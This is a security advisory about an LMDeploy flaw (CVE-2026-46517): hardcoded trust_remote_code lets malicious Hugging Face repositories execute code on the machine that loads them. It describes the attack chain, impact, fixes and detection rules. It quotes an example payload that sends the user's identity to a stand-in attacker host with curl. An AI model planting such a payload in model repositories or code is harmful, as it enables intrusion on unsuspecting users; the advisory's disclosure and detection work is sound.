LMDeploy Hardcoded trust_remote_code Enables Remote Code Execution (CVE-2026-46517)
LMDeploy <= 0.12.3 is vulnerable to remote code execution (CVE-2026-46517) because it hardcodes `trust_remote_code=True` when calling `transformers.AutoConfig.from_pretrained()`, allowing a malicious Hugging Face repository to execute arbitrary Python code when loaded without user opt-out.
LMDeploy, a toolkit for large model deployment, is vulnerable due to its hardcoded trust_remote_code=True setting within the transformers.AutoConfig.from_pretrained() function calls. This bypasses the default-secure stance of Hugging Face Transformers (≥ 4.30) and allows arbitrary Python code execution when a user loads a model from a malicious Hugging Face repository. Specifically, this issue affects users running lmdeploy serve api_server, lmdeploy lite calibrate, or other related commands against untrusted repositories. The vulnerability stems from the lack of user control over the trust_remote_code parameter, and is tracked as CVE-2026-46517. The affected version is lmdeploy <= 0.12.3.
Attack Chain
- Attacker creates a malicious Hugging Face repository containing a
config.jsonfile with anauto_mapkey pointing to a customconfiguration_evil.pyfile. - The
configuration_evil.pyfile contains malicious Python code, such asos.system("curl https://attacker/?$(whoami)"), designed to execute when imported. - A user, following a tutorial or benchmarking models, runs an lmdeploy command such as
lmdeploy serve api_server <attacker_repo>orlmdeploy lite calibrate <attacker_repo>. - LMDeploy calls
transformers.AutoConfig.from_pretrained(model_path, trust_remote_code=True)due to the hardcodedtrust_remote_code=Trueinlmdeploy/archs.py,lmdeploy/lite/apis/calibrate.py, andlmdeploy/lite/utils/load.py. - Hugging Face Transformers downloads the
configuration_evil.pyfile from the malicious repository. - Hugging Face Transformers imports the
configuration_evil.pymodule, causing the malicious Python code to execute. - The attacker gains code execution on the user's machine with the privileges of the lmdeploy process.
- The attacker can then perform actions such as stealing credentials, installing malware, or compromising the system.
Impact
Successful exploitation allows an attacker to execute arbitrary code on the victim's machine. The impact includes potential data theft, system compromise, and further propagation of the attack. This vulnerability affects any user of LMDeploy who loads models from untrusted sources, impacting casual users, CI pipelines, and researchers. The vulnerability exists because LMDeploy overrides Hugging Face's default-secure stance without providing any warning or opt-out mechanism to the user.
Recommendation
- Upgrade to a patched version of LMDeploy that includes a CLI flag for
--trust-remote-codedefaulting to False, as described in the Suggested fix section. - Deploy the Sigma rule
Detect LMDeploy Remote Code Execution via Configuration File Importto detect potential exploitation attempts by monitoring process creation events related to Python and file paths from the Hugging Face cache. - Exercise extreme caution when loading models from untrusted Hugging Face repositories with LMDeploy, and avoid running LMDeploy commands against repositories that have not been thoroughly vetted.
- Monitor network connections initiated by Python processes originating from the Hugging Face Transformers cache directory, using a network connection monitoring rule.
Detection coverage 2
Detect LMDeploy Remote Code Execution via Configuration File Import
mediumDetects CVE-2026-46517 exploitation - Monitors for process creation events where Python imports a configuration file from a Hugging Face Transformers cache, indicating potential remote code execution via a malicious model repository.
Detect Network Connections from Hugging Face Cache
lowDetects network connections initiated by Python processes originating from the Hugging Face Transformers cache directory, potentially indicating remote code execution.
Detection queries are available on the platform. Get full rules →
Indicators of compromise
1
| Type | Value |
|---|---|
| sactransport2000@gmail.com |